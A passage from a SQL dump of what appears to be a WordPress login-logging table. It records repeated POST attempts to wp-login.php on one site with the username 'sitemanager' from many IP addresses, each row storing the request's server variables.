Safari/614.31.14\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"40256\";s:11:\"REMOTE_ADDR\";s:13:\"63.250.38.202\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745414171.3802879;s:12:\"REQUEST_TIME\";i:1745414171;}}','63.250.38.202',0,'2025-04-23 18:46:13','1970-01-01 00:00:00'),(93917,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ru-RU,ru;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, zstd, br\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"102\";s:15:\"HTTP_USER_AGENT\";s:128:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"49512\";s:11:\"REMOTE_ADDR\";s:14:\"185.222.163.90\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"102\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745414541.0597961;s:12:\"REQUEST_TIME\";i:1745414541;}}','185.222.163.90',0,'2025-04-23 18:52:22','1970-01-01 00:00:00'),(93918,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"pt-BR,pt;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, br, deflate\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"40876\";s:11:\"REMOTE_ADDR\";s:13:\"52.21.209.231\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745414908.0879469;s:12:\"REQUEST_TIME\";i:1745414908;}}','52.21.209.231',0,'2025-04-23 18:58:29','1970-01-01 00:00:00'),(93919,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"he-IL,he;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, br, deflate\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"103\";s:15:\"HTTP_USER_AGENT\";s:117:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"36380\";s:11:\"REMOTE_ADDR\";s:12:\"66.29.141.17\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"103\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745415276.907351;s:12:\"REQUEST_TIME\";i:1745415276;}}','66.29.141.17',0,'2025-04-23 19:04:38','1970-01-01 00:00:00'),(93920,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"uk-UA,uk;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"gzip, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"102\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"58342\";s:11:\"REMOTE_ADDR\";s:12:\"66.29.141.17\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"102\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745415645.4738719;s:12:\"REQUEST_TIME\";i:1745415645;}}','66.29.141.17',0,'2025-04-23 19:10:47','1970-01-01 00:00:00'),(93921,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ar-SA,ar;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:84:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"42672\";s:11:\"REMOTE_ADDR\";s:12:\"23.239.27.53\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745416020.0216751;s:12:\"REQUEST_TIME\";i:1745416020;}}','23.239.27.53',0,'2025-04-23 19:17:01','1970-01-01 00:00:00'),(93922,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ar-SA,ar;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"102\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36 Edg/112.0.1722.68\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"41984\";s:11:\"REMOTE_ADDR\";s:13:\"185.79.157.23\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"102\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745416392.109972;s:12:\"REQUEST_TIME\";i:1745416392;}}','185.79.157.23',0,'2025-04-23 19:23:13','1970-01-01 00:00:00'),(93923,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"cs-CZ,cs;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, br, deflate\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"112\";s:15:\"HTTP_USER_AGENT\";s:84:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0.1) Gecko/20100101 Firefox/125.0.1\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"42878\";s:11:\"REMOTE_ADDR\";s:15:\"199.188.200.145\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"112\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745416754.7959011;s:12:\"REQUEST_TIME\";i:1745416754;}}','199.188.200.145',0,'2025-04-23 19:29:16','1970-01-01 00:00:00'),(93924,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ru-RU,ru;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:10:\"gzip, zstd\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"115\";s:15:\"HTTP_USER_AGENT\";s:111:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"42062\";s:11:\"REMOTE_ADDR\";s:14:\"67.223.118.141\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"115\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745417131.2742579;s:12:\"REQUEST_TIME\";i:1745417131;}}','67.223.118.141',0,'2025-04-23 19:35:32','1970-01-01 00:00:00'),(93925,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ko-KR,ko;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"114\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"57308\";s:11:\"REMOTE_ADDR\";s:13:\"66.102.132.19\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"114\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745417506.3100629;s:12:\"REQUEST_TIME\";i:1745417506;}}','66.102.132.19',0,'2025-04-23 19:41:48','1970-01-01 00:00:00'),(93926,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"sv-SE,sv;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"37604\";s:11:\"REMOTE_ADDR\";s:12:\"209.74.67.29\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745417883.7057381;s:12:\"REQUEST_TIME\";i:1745417883;}}','209.74.67.29',0,'2025-04-23 19:48:05','1970-01-01 